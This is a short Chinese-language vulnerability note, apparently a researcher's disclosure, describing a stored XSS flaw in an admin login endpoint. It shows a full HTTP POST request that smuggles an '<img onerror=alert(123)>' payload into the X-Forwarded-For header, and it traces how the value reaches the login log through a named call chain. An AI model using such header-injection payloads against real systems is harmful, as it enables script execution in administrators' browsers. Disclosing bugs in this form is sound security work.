后台登录存储型xss漏洞

[m4ra7h0n]

登录添加X-Forward-IP头

POST /admin/getLogin HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 56
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.<img src=1 onerror=alert(123)>0.0.2

触发链 AdminController.getLogin() LogServiceImpl.save() ServletUtil.getClietnIP()